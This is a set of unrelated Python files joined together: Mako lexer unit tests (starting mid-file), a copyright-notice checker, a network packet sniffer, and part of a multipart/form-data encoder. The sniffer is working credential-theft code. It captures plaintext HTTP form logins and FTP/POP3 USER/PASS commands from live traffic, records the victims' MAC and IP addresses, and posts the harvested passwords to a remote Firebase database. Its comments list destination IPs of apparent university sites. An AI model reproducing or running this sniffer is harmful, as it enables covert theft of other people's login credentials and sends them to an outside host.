13), []), Text('\n ', (3, 64))]))
def test_ns_tag_empty(self):
template = \
"""
<%form:option value=""></%form:option>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n ',
(1, 1)), CallNamespaceTag('form:option',
{'value': ''}, (2, 13), []), Text('\n '
, (2, 51))]))
def test_ns_tag_open(self):
template = \
"""
<%self:go x="1" y="${process()}">
this is the body
</%self:go>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''
''', (1, 1)),
CallNamespaceTag('self:go', {'x': '1', 'y'
: '${process()}'}, (3, 13),
[Text('''
this is the body
''',
(3, 46))]), Text('\n ', (5, 24))]))
def test_expr_in_attribute(self):
"""test some slightly trickier expressions.
you can still trip up the expression parsing, though, unless we
integrated really deeply somehow with AST."""
template = \
"""
<%call expr="foo>bar and 'lala' or 'hoho'"/>
<%call expr='foo<bar and hoho>lala and "x" + "y"'/>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n ',
(1, 1)), CallTag('call', {'expr'
: "foo>bar and 'lala' or 'hoho'"}, (2, 13), []),
Text('\n ', (2, 57)), CallTag('call'
, {'expr': 'foo<bar and hoho>lala and "x" + "y"'
}, (3, 13), []), Text('\n ', (3, 64))]))
def test_pagetag(self):
template = \
"""
<%page cached="True", args="a, b"/>
some template
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n ',
(1, 1)), PageTag('page', {'args': 'a, b',
'cached': 'True'}, (2, 13), []),
Text('''
some template
''',
(2, 48))]))
def test_nesting(self):
template = \
"""
<%namespace name="ns">
<%def name="lala(hi, there)">
<%call expr="something()"/>
</%def>
</%namespace>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''
''', (1, 1)),
NamespaceTag('namespace', {'name': 'ns'}, (3,
9), [Text('\n ', (3, 31)),
DefTag('def', {'name': 'lala(hi, there)'}, (4,
13), [Text('\n ', (4, 42)),
CallTag('call', {'expr': 'something()'}, (5,
17), []), Text('\n ', (5, 44))]),
Text('\n ', (6, 20))]),
Text('''
''', (7, 22))]))
if compat.py3k:
def test_code(self):
template = \
"""text
<%
print("hi")
for x in range(1,5):
print(x)
%>
more text
<%!
import foo
%>
"""
nodes = Lexer(template).parse()
self._compare(nodes,
TemplateNode({}, [
Text('text\n ', (1, 1)),
Code('\nprint("hi")\nfor x in range(1,5):\n '
'print(x)\n \n', False, (2, 5)),
Text('\nmore text\n ', (6, 7)),
Code('\nimport foo\n \n', True, (8, 5)),
Text('\n', (10, 7))])
)
else:
def test_code(self):
template = \
"""text
<%
print "hi"
for x in range(1,5):
print x
%>
more text
<%!
import foo
%>
"""
nodes = Lexer(template).parse()
self._compare(nodes,
TemplateNode({}, [
Text('text\n ', (1, 1)),
Code('\nprint "hi"\nfor x in range(1,5):\n '
'print x\n \n', False, (2, 5)),
Text('\nmore text\n ', (6, 7)),
Code('\nimport foo\n \n', True, (8, 5)),
Text('\n', (10, 7))])
)
def test_code_and_tags(self):
template = \
"""
<%namespace name="foo">
<%def name="x()">
this is x
</%def>
<%def name="y()">
this is y
</%def>
</%namespace>
<%
result = []
data = get_data()
for x in data:
result.append(x+7)
%>
result: <%call expr="foo.x(result)"/>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n', (1, 1)),
NamespaceTag('namespace', {'name': 'foo'}, (2,
1), [Text('\n ', (2, 24)), DefTag('def',
{'name': 'x()'}, (3, 5),
[Text('''\n this is x\n ''', (3, 22))]),
Text('\n ', (5, 12)), DefTag('def', {'name'
: 'y()'}, (6, 5),
[Text('''\n this is y\n ''', (6, 22))]),
Text('\n', (8, 12))]), Text('''\n\n''', (9, 14)),
Code('''\nresult = []\ndata = get_data()\n'''
'''for x in data:\n result.append(x+7)\n\n''',
False, (11, 1)), Text('''\n\n result: ''', (16,
3)), CallTag('call', {'expr': 'foo.x(result)'
}, (18, 13), []), Text('\n', (18, 42))]))
def test_expression(self):
template = \
"""
this is some ${text} and this is ${textwith | escapes, moreescapes}
<%def name="hi()">
give me ${foo()} and ${bar()}
</%def>
${hi()}
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('\n this is some ', (1, 1)),
Expression('text', [], (2, 22)),
Text(' and this is ', (2, 29)),
Expression('textwith ', ['escapes', 'moreescapes'
], (2, 42)), Text('\n ', (2, 76)),
DefTag('def', {'name': 'hi()'}, (3, 9),
[Text('\n give me ', (3, 27)),
Expression('foo()', [], (4, 21)), Text(' and ',
(4, 29)), Expression('bar()', [], (4, 34)),
Text('\n ', (4, 42))]), Text('\n '
, (5, 16)), Expression('hi()', [], (6, 9)),
Text('\n', (6, 16))]))
def test_tricky_expression(self):
template = """
${x and "|" or "hi"}
"""
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('\n\n ', (1, 1)),
Expression('x and "|" or "hi"', [], (3, 13)),
Text('\n ', (3, 33))
])
)
template = """
${hello + '''heres '{|}' text | | }''' | escape1}
"""
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('\n\n ', (1, 1)),
Expression("hello + '''heres '{|}' text | | }''' ",
['escape1'], (3, 13)),
Text('\n ', (3, 62))
])
)
def test_tricky_code(self):
if compat.py3k:
template = """<% print('hi %>') %>"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("print('hi %>') \n", False, (1, 1))]))
else:
template = """<% print 'hi %>' %>"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("print 'hi %>' \n", False, (1, 1))]))
def test_tricky_code_2(self):
template = \
"""<%
# someone's comment
%>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""
# someone's comment
""",
False, (1, 1)), Text('\n ', (3, 3))]))
if compat.py3k:
def test_tricky_code_3(self):
template = \
"""<%
print('hi')
# this is a comment
# another comment
x = 7 # someone's '''comment
print('''
there
''')
# someone else's comment
%> '''and now some text '''"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""
print('hi')
# this is a comment
# another comment
x = 7 # someone's '''comment
print('''
there
''')
# someone else's comment
""",
False, (1, 1)),
Text(" '''and now some text '''", (10,
3))]))
else:
def test_tricky_code_3(self):
template = \
"""<%
print 'hi'
# this is a comment
# another comment
x = 7 # someone's '''comment
print '''
there
'''
# someone else's comment
%> '''and now some text '''"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""\nprint 'hi'\n# this is a comment\n"""
"""# another comment\nx = 7 """
"""# someone's '''comment\nprint '''\n """
"""there\n '''\n# someone else's """
"""comment\n\n""",
False, (1, 1)),
Text(" '''and now some text '''", (10, 3))]))
def test_tricky_code_4(self):
template = \
"""<% foo = "\\"\\\\" %>"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""foo = "\\"\\\\" \n""",
False, (1, 1))]))
def test_tricky_code_5(self):
template = \
"""before ${ {'key': 'value'} } after"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('before ', (1, 1)),
Expression(" {'key': 'value'} ", [], (1, 8)),
Text(' after', (1, 29))]))
def test_control_lines(self):
template = \
"""
text text la la
% if foo():
mroe text la la blah blah
% endif
and osme more stuff
% for l in range(1,5):
tex tesl asdl l is ${l} kfmas d
% endfor
tetx text
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''\ntext text la la\n''', (1, 1)),
ControlLine('if', 'if foo():', False, (3, 1)),
Text(' mroe text la la blah blah\n', (4, 1)),
ControlLine('if', 'endif', True, (5, 1)),
Text('''\n and osme more stuff\n''', (6,
1)), ControlLine('for', 'for l in range(1,5):',
False, (8, 1)), Text(' tex tesl asdl l is ',
(9, 1)), Expression('l', [], (9, 24)),
Text(' kfmas d\n', (9, 28)), ControlLine('for',
'endfor', True, (10, 1)),
Text(''' tetx text\n\n''', (11, 1))]))
def test_control_lines_2(self):
template = \
"""% for file in requestattr['toc'].filenames:
x
% endfor
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [ControlLine('for',
"for file in requestattr['toc'].filenames:",
False, (1, 1)), Text(' x\n', (2, 1)),
ControlLine('for', 'endfor', True, (3, 1))]))
def test_long_control_lines(self):
template = \
"""
% for file in \\
requestattr['toc'].filenames:
x
% endfor
"""
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('\n', (1, 1)),
ControlLine('for', "for file in \\\n "
"requestattr['toc'].filenames:",
False, (2, 1)),
Text(' x\n', (4, 1)),
ControlLine('for', 'endfor', True, (5, 1)),
Text(' ', (6, 1))
])
)
def test_unmatched_control(self):
template = """
% if foo:
% for x in range(1,5):
% endif
"""
assert_raises_message(
exceptions.SyntaxException,
"Keyword 'endif' doesn't match keyword 'for' at line: 5 char: 1",
Lexer(template).parse
)
def test_unmatched_control_2(self):
template = """
% if foo:
% for x in range(1,5):
% endfor
"""
assert_raises_message(
exceptions.SyntaxException,
"Unterminated control keyword: 'if' at line: 3 char: 1",
Lexer(template).parse
)
def test_unmatched_control_3(self):
template = """
% if foo:
% for x in range(1,5):
% endlala
% endif
"""
assert_raises_message(
exceptions.SyntaxException,
"Keyword 'endlala' doesn't match keyword 'for' at line: 5 char: 1",
Lexer(template).parse
)
def test_ternary_control(self):
template = \
"""
% if x:
hi
% elif y+7==10:
there
% elif lala:
lala
% else:
hi
% endif
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n', (1, 1)),
ControlLine('if', 'if x:', False, (2, 1)),
Text(' hi\n', (3, 1)),
ControlLine('elif', 'elif y+7==10:', False, (4,
1)), Text(' there\n', (5, 1)),
ControlLine('elif', 'elif lala:', False, (6,
1)), Text(' lala\n', (7, 1)),
ControlLine('else', 'else:', False, (8, 1)),
Text(' hi\n', (9, 1)),
ControlLine('if', 'endif', True, (10, 1))]))
def test_integration(self):
template = \
"""<%namespace name="foo" file="somefile.html"/>
## inherit from foobar.html
<%inherit file="foobar.html"/>
<%def name="header()">
<div>header</div>
</%def>
<%def name="footer()">
<div> footer</div>
</%def>
<table>
% for j in data():
<tr>
% for x in j:
<td>Hello ${x| h}</td>
% endfor
</tr>
% endfor
</table>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [NamespaceTag('namespace'
, {'file': 'somefile.html', 'name': 'foo'},
(1, 1), []), Text('\n', (1, 46)),
Comment('inherit from foobar.html', (2, 1)),
InheritTag('inherit', {'file': 'foobar.html'},
(3, 1), []), Text('''\n\n''', (3, 31)),
DefTag('def', {'name': 'header()'}, (5, 1),
[Text('''\n <div>header</div>\n''', (5,
23))]), Text('\n', (7, 8)), DefTag('def',
{'name': 'footer()'}, (8, 1),
[Text('''\n <div> footer</div>\n''', (8,
23))]), Text('''\n\n<table>\n''', (10, 8)),
ControlLine('for', 'for j in data():', False,
(13, 1)), Text(' <tr>\n', (14, 1)),
ControlLine('for', 'for x in j:', False, (15,
1)), Text(' <td>Hello ', (16, 1)),
Expression('x', ['h'], (16, 23)), Text('</td>\n'
, (16, 30)), ControlLine('for', 'endfor', True,
(17, 1)), Text(' </tr>\n', (18, 1)),
ControlLine('for', 'endfor', True, (19, 1)),
Text('</table>\n', (20, 1))]))
def test_comment_after_statement(self):
template = \
"""
% if x: #comment
hi
% else: #next
hi
% endif #end
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n', (1, 1)),
ControlLine('if', 'if x: #comment', False, (2,
1)), Text(' hi\n', (3, 1)),
ControlLine('else', 'else: #next', False, (4,
1)), Text(' hi\n', (5, 1)),
ControlLine('if', 'endif #end', True, (6, 1))]))
def test_crlf(self):
template = util.read_file(self._file_path("crlf.html"))
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('<html>\r\n\r\n', (1, 1)),
PageTag('page', {
'args': "a=['foo',\n 'bar']"
}, (3, 1), []),
Text('\r\n\r\nlike the name says.\r\n\r\n', (4, 26)),
ControlLine('for', 'for x in [1,2,3]:', False, (8, 1)),
Text(' ', (9, 1)),
Expression('x', [], (9, 9)),
ControlLine('for', 'endfor', True, (10, 1)),
Text('\r\n', (11, 1)),
Expression("trumpeter == 'Miles' and "
"trumpeter or \\\n 'Dizzy'",
[], (12, 1)),
Text('\r\n\r\n', (13, 15)),
DefTag('def', {'name': 'hi()'}, (15, 1), [
Text('\r\n hi!\r\n', (15, 19))]),
Text('\r\n\r\n</html>\r\n', (17, 8))
])
)
assert flatten_result(Template(template).render()) \
== """<html> like the name says. 1 2 3 Dizzy </html>"""
def test_comments(self):
template = \
"""
<style>
#someselector
# other non comment stuff
</style>
## a comment
# also not a comment
## this is a comment
this is ## not a comment
<%doc> multiline
comment
</%doc>
hi
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''\n<style>\n #someselector\n # '''
'''other non comment stuff\n</style>\n''',
(1, 1)), Comment('a comment', (6, 1)),
Text('''\n# also not a comment\n\n''', (7, 1)),
Comment('this is a comment', (10, 1)),
Text('''\nthis is ## not a comment\n\n''', (11,
1)), Comment(''' multiline\ncomment\n''', (14,
1)), Text('''
hi
''', (16, 8))]))
def test_docs(self):
template = \
"""
<%doc>
this is a comment
</%doc>
<%def name="foo()">
<%doc>
this is the foo func
</%doc>
</%def>
"""
nodes = Lexer(template).parse()
self._compare(nodes,
TemplateNode({}, [Text('\n ', (1,
1)),
Comment('''\n this is a comment\n ''',
(2, 9)), Text('\n ', (4, 16)),
DefTag('def', {'name': 'foo()'}, (5, 9),
[Text('\n ', (5, 28)),
Comment('''\n this is the foo func\n'''
''' ''',
(6, 13)), Text('\n ', (8, 20))]),
Text('\n ', (9, 16))]))
def test_preprocess(self):
def preproc(text):
return re.sub(r'(?<=\n)\s*#[^#]', '##', text)
template = \
"""
hi
# old style comment
# another comment
"""
nodes = Lexer(template, preprocessor=preproc).parse()
self._compare(nodes, TemplateNode({}, [Text('''\n hi\n''',
(1, 1)), Comment('old style comment', (3, 1)),
Comment('another comment', (4, 1))]))
|
|
#!/usr/bin/env python
# Copyright (c) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Checks for copyright notices in all the files that need them under the
current directory. Optionally insert them. When inserting, replaces
an MIT or Khronos free use license with Apache 2.
"""
from __future__ import print_function
import argparse
import fileinput
import fnmatch
import inspect
import os
import re
import sys
# List of designated copyright owners.
AUTHORS = ['The Khronos Group Inc.',
'LunarG Inc.',
'Google Inc.']
CURRENT_YEAR='2016'
YEARS = '(2014-2016|2015-2016|2016)'
COPYRIGHT_RE = re.compile(
'Copyright \(c\) {} ({})'.format(YEARS, '|'.join(AUTHORS)))
MIT_BEGIN_RE = re.compile('Permission is hereby granted, '
'free of charge, to any person obtaining a')
MIT_END_RE = re.compile('MATERIALS OR THE USE OR OTHER DEALINGS IN '
'THE MATERIALS.')
APACHE2_BEGIN_RE = re.compile('Licensed under the Apache License, '
'Version 2.0 \(the "License"\);')
APACHE2_END_RE = re.compile('limitations under the License.')
LICENSED = """Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
LICENSED_LEN = 10 # Number of lines in LICENSED
def find(top, filename_glob, skip_glob_list):
"""Returns files in the tree rooted at top matching filename_glob but not
in directories matching skip_glob_list."""
file_list = []
for path, dirs, files in os.walk(top):
for glob in skip_glob_list:
for match in fnmatch.filter(dirs, glob):
dirs.remove(match)
for filename in fnmatch.filter(files, filename_glob):
file_list.append(os.path.join(path, filename))
return file_list
def filtered_descendants(glob):
"""Returns glob-matching filenames under the current directory, but skips
some irrelevant paths."""
return find('.', glob, ['third_party', 'external', 'build*', 'out*'])
def skip(line):
"""Returns true if line is all whitespace or shebang."""
stripped = line.lstrip()
return stripped == '' or stripped.startswith('#!')
def comment(text, prefix):
"""Returns commented-out text.
Each line of text will be prefixed by prefix and a space character. Any
trailing whitespace will be trimmed.
"""
accum = ['{} {}'.format(prefix, line).rstrip() for line in text.split('\n')]
return '\n'.join(accum)
def insert_copyright(author, glob, comment_prefix):
"""Finds all glob-matching files under the current directory and inserts the
copyright message, and license notice. An MIT license or Khronos free
use license (modified MIT) is replaced with an Apache 2 license.
The copyright message goes into the first non-whitespace, non-shebang line
in a file. The license notice follows it. Both are prefixed on each line
by comment_prefix and a space.
"""
copyright = comment('Copyright (c) {} {}'.format(CURRENT_YEAR, author),
comment_prefix) + '\n\n'
licensed = comment(LICENSED, comment_prefix) + '\n\n'
for file in filtered_descendants(glob):
# Parsing states are:
# 0 Initial: Have not seen a copyright declaration.
# 1 Seen a copyright line and no other interesting lines
# 2 In the middle of an MIT or Khronos free use license
# 9 Exited any of the above
state = 0
update_file = False
for line in fileinput.input(file, inplace=1):
emit = True
if state is 0:
if COPYRIGHT_RE.search(line):
state = 1
elif skip(line):
pass
else:
# Didn't see a copyright. Inject copyright and license.
sys.stdout.write(copyright)
sys.stdout.write(licensed)
# Assume there isn't a previous license notice.
state = 1
elif state is 1:
if MIT_BEGIN_RE.search(line):
state = 2
emit = False
elif APACHE2_BEGIN_RE.search(line):
# Assume an Apache license is preceded by a copyright
# notice. So just emit it like the rest of the file.
state = 9
elif state is 2:
# Replace the MIT license with Apache 2
emit = False
if MIT_END_RE.search(line):
state = 9
sys.stdout.write(licensed)
if emit:
sys.stdout.write(line)
def alert_if_no_copyright(glob, comment_prefix):
"""Prints names of all files missing either a copyright or Apache 2 license.
Finds all glob-matching files under the current directory and checks if they
contain the copyright message and license notice. Prints the names of all the
files that don't meet both criteria.
Returns the total number of file names printed.
"""
printed_count = 0
for file in filtered_descendants(glob):
has_copyright = False
has_apache2 = False
line_num = 0
apache_expected_end = 0
with open(file) as contents:
for line in contents:
line_num += 1
if COPYRIGHT_RE.search(line):
has_copyright = True
if APACHE2_BEGIN_RE.search(line):
apache_expected_end = line_num + LICENSED_LEN
if (line_num is apache_expected_end) and APACHE2_END_RE.search(line):
has_apache2 = True
if not (has_copyright and has_apache2):
message = file
if not has_copyright:
message += ' has no copyright'
if not has_apache2:
message += ' has no Apache 2 license notice'
print(message)
printed_count += 1
return printed_count
class ArgParser(argparse.ArgumentParser):
def __init__(self):
super(ArgParser, self).__init__(
description=inspect.getdoc(sys.modules[__name__]))
self.add_argument('--update', dest='author', action='store',
help='For files missing a copyright notice, insert '
'one for the given author, and add a license '
'notice. The author must be in the AUTHORS '
'list in the script.')
def main():
glob_comment_pairs = [('*.h', '//'), ('*.hpp', '//'), ('*.sh', '#'),
('*.py', '#'), ('*.cpp', '//'),
('CMakeLists.txt', '#')]
argparser = ArgParser()
args = argparser.parse_args()
if args.author:
if args.author not in AUTHORS:
print('error: --update argument must be in the AUTHORS list in '
'check_copyright.py: {}'.format(AUTHORS))
sys.exit(1)
for pair in glob_comment_pairs:
insert_copyright(args.author, *pair)
sys.exit(0)
else:
count = sum([alert_if_no_copyright(*p) for p in glob_comment_pairs])
sys.exit(count > 0)
if __name__ == '__main__':
main()
|
|
import dpkt
import pcap
import re
import socket
import urlparse
import binascii
import signal
import sys
from firebase import firebase
from pprint import pprint
import settings
from utils import add_colons_to_mac
APP = {80: 'HTTP', 23: 'TELNET', 21: 'FTP', 110: 'POP3'}
class Sniffer(object):
def __init__(self, *args, **kwargs):
self._firebase = firebase.FirebaseApplication(settings.FIREBASE_URL,
None)
# Status update
self._firebase.patch('/status', {"status": "ON"})
pattern = 'tcp and dst port 80 or dst port 21'
# pattern = 'tcp and dst port 80 or dst port 21 or dst port 110'
self.pc = pcap.pcap(kwargs['interface'])
self.pc.setfilter(pattern)
self.all_user_info = {}
self.devices_mac = {}
self.info_counter = 0
def _is_host(self, content):
regex = re.compile('Host: (.*)')
return content is not None and regex.search(content)
def _is_pwd(self, content):
regex = re.compile('(.*)[password]=(.*)')
return content is not None and regex.search(content)
def _is_pwd_with_txt(self, content):
regex = re.compile('(.*)[txtPwd]=(.*)')
return content is not None and regex.search(content)
def _pick_ftp_info(self, data, client, server, dport, eth_src):
self.devices_mac.setdefault(add_colons_to_mac(eth_src), {})
self.devices_mac[add_colons_to_mac(eth_src)]['client'] = client
self.devices_mac[add_colons_to_mac(eth_src)]['server'] = server
self.devices_mac[add_colons_to_mac(eth_src)]['app'] = APP.get(dport)
self.devices_mac[add_colons_to_mac(eth_src)]['mac'] = (
add_colons_to_mac(eth_src))
if data.get('USER'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'login': data.get('USER')})
if data.get('PASS'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'password': data.get('PASS')})
device_info = self.devices_mac[add_colons_to_mac(eth_src)]
if 'login' and 'password' in device_info.keys():
print "FTP New Password get:"
pprint(self.devices_mac[add_colons_to_mac(eth_src)])
self._firebase.post('/pwd_table',
self.devices_mac[add_colons_to_mac(eth_src)])
# When push to firebase delete it
del self.devices_mac[add_colons_to_mac(eth_src)]
def _pick_http_info(self, data, client, server, dport, eth_src):
self.info_counter += 1
self.all_user_info[self.info_counter] = (
{'client': client, 'server': server,
'app': APP.get(dport),
'mac': add_colons_to_mac(binascii.hexlify(eth_src))}
)
if data.get('account'):
self.all_user_info[self.info_counter].update(
{'login': data.get('account')[0]})
elif data.get('username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('username')[0]})
elif data.get('identification'):
self.all_user_info[self.info_counter].update({
'login': data.get('identification')[0]})
elif data.get('id'):
self.all_user_info[self.info_counter].update(
{'login': data.get('id')[0]})
elif data.get('os_username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('os_username')[0]})
elif data.get('txtAccount'):
self.all_user_info[self.info_counter].update(
{'login': data.get('txtAccount')[0]})
elif data.get('email'):
self.all_user_info[self.info_counter].update(
{'login': data.get('email')[0]})
else:
self.all_user_info[self.info_counter].update({'login': None})
if data.get('password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('password')[0]})
elif data.get('os_password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('os_password')[0]})
elif data.get('txtPwd'):
self.all_user_info[self.info_counter].update(
{'password': data.get('txtPwd')[0]})
else:
self.all_user_info[self.info_counter].update({'password': None})
print "HTTP New Password get:"
pprint(self.all_user_info[self.info_counter])
self._firebase.post('/pwd_table', self.all_user_info[self.info_counter])
def _get_ftp_pop_payload(self, eth_pkt, ip_pkt, tcp_pkt):
if 'USER' in tcp_pkt.data:
regex = re.compile('USER (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'PASS' in tcp_pkt.data:
regex = re.compile('PASS (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'user' in tcp_pkt.data:
regex = re.compile('user (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'pass' in tcp_pkt.data:
regex = re.compile('pass (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
else:
return
def _get_http_payload(self, eth_pkt, ip_pkt, tcp_pkt):
try:
http_req = dpkt.http.Request(tcp_pkt.data)
if http_req.method == 'POST':
# This is POST method
pass
except dpkt.dpkt.UnpackError:
pass
if 'POST' in tcp_pkt.data:
# print 'POST', tcp.data
if 'password=' in tcp_pkt.data:
# print 'In POST packet password', tcp.data
pwd_obj = self._is_pwd(tcp_pkt.data)
if pwd_obj:
# print 'query string found:', pwd_obj.group(0)
qs_d = urlparse.parse_qs(pwd_obj.group(0))
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'password=' in tcp_pkt.data:
# print 'password', tcp.data
qs_d = urlparse.parse_qs(tcp_pkt.data)
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'txtPwd=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'email=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
else:
return
# Moocs dst IP 140.114.60.144
# Kits dst IP 74.125.204.121
# iLMS dst IP 140.114.69.137
def loop(self):
while True:
result = self._firebase.get('/status', None)
if result.get('status') == 'ON':
try:
for ts, buf in self.pc:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
tcp = ip.data
if len(tcp.data) > 0:
# print 'Packet in dst port number', tcp.dport
# make sure the pattern is correct
if tcp.dport == 80:
self._get_http_payload(eth, ip, tcp)
elif tcp.dport == 21 or tcp.dport == 110:
self._get_ftp_pop_payload(eth, ip, tcp)
else:
pass
except KeyboardInterrupt:
nrecv, ndrop, nifdrop = self.pc.stats()
print '\n%d packets received by filter' % nrecv
print '%d packets dropped by kernel' % ndrop
break
except (NameError, TypeError):
# print "No packet"
continue
else:
signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))
print "I can not see packets."
continue
def __del__(self):
# Status update
self._firebase.patch('/status', {"status": "OFF"})
if __name__ == "__main__":
s = Sniffer(interface='eth2')
print '%s is listening on' % s.pc.name
s.loop()
|
|
"""multipart/form-data encoding module
This module provides functions that faciliate encoding name/value pairs
as multipart/form-data suitable for a HTTP POST or PUT request.
multipart/form-data is the standard way to upload files over HTTP"""
__all__ = ['gen_boundary', 'encode_and_quote', 'MultipartParam',
'encode_string', 'encode_file_header', 'get_body_size', 'get_headers',
'multipart_encode']
try:
import uuid
def gen_boundary():
"""Returns a random string to use as the boundary for a message"""
return uuid.uuid4().hex
except ImportError:
import random, sha
def gen_boundary():
"""Returns a random string to use as the boundary for a message"""
bits = random.getrandbits(160)
return sha.new(str(bits)).hexdigest()
import urllib, re, os, mimetypes
def encode_and_quote(data):
"""If ``data`` is unicode, return urllib.quote_plus(data.encode("utf-8"))
otherwise return urllib.quote_plus(data)"""
if data is None:
return None
if isinstance(data, unicode):
data = data.encode("utf-8")
return urllib.quote_plus(data)
def _strify(s):
"""If s is a unicode string, encode it to UTF-8 and return the results,
otherwise return str(s), or None if s is None"""
if s is None:
return None
if isinstance(s, unicode):
return s.encode("utf-8")
return str(s)
class MultipartParam(object):
"""Represents a single parameter in a multipart/form-data request
``name`` is the name of this parameter.
If ``value`` is set, it must be a string or unicode object to use as the
data for this parameter.
If ``filename`` is set, it is what to say that this parameter's filename
is. Note that this does not have to be the actual filename any local file.
If ``filetype`` is set, it is used as the Content-Type for this parameter.
If unset it defaults to "text/plain; charset=utf8"
If ``filesize`` is set, it specifies the length of the file ``fileobj``
If ``fileobj`` is set, it must be a file-like object that supports
.read().
Both ``value`` and ``fileobj`` must not be set, doing so will
raise a ValueError assertion.
If ``fileobj`` is set, and ``filesize`` is not specified, then
the file's size will be determined first by stat'ing ``fileobj``'s
file descriptor, and if that fails, by seeking to the end of the file,
recording the current position as the size, and then by seeking back to the
beginning of the file.
``cb`` is a callable which will be called from iter_encode with (self,
current, total), representing the current parameter, current amount
transferred, and the total size.
"""
def __init__(self, name, value=None, filename=None, filetype=None,
filesize=None, fileobj=None, cb=None):
self.name = encode_and_quote(name)
self.value = _strify(value)
if filename is None:
self.filename = None
else:
if isinstance(filename, unicode):
# Encode with XML entities
self.filename = filename.encode("ascii", "xmlcharrefreplace")
else:
self.filename = str(filename)
self.filename = self.filename.encode("string_escape").\
replace('"', '\\"')
self.filetype = _strify(filetype)
self.filesize = filesize
self.fileobj = fileobj
self.cb = cb
if self.value is not None and self.fileobj is not None:
raise ValueError("Only one of value or fileobj may be specified")
if fileobj is not None and filesize is None:
# Try and determine the file size
try:
self.filesize = os.fstat(fileobj.fileno()).st_size
except (OSError, AttributeError):
try:
fileobj.seek(0, 2)
self.filesize = fileobj.tell()
fileobj.seek(0)
except:
raise ValueError("Could not determine filesize")
def __cmp__(self, other):
attrs = ['name', 'value', 'filename', 'filetype', 'filesize', 'fileobj']
myattrs = [getattr(self, a) for a in attrs]
oattrs = [getattr(other, a) for a in attrs]
return cmp(myattrs, oattrs)
def reset(self):
